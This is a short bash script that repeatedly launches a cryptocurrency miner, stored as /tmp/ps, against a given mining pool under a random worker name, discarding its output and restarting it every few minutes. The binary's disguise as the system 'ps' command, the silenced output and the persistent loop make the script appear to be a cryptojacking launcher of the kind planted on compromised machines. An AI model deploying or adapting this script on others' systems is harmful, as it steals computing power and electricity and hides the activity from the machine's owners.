#!/bin/bash

user="$1"
pool_url="$2"
pool_port="$3"
worker="$(shuf -n 1 -i 1-999999)"

while :
do
  timeout 3m /tmp/ps --pool $pool_url:$pool_port --username $user.$worker --password x --algorithm wrkzcoin >/dev/null
  sleep 20s
done
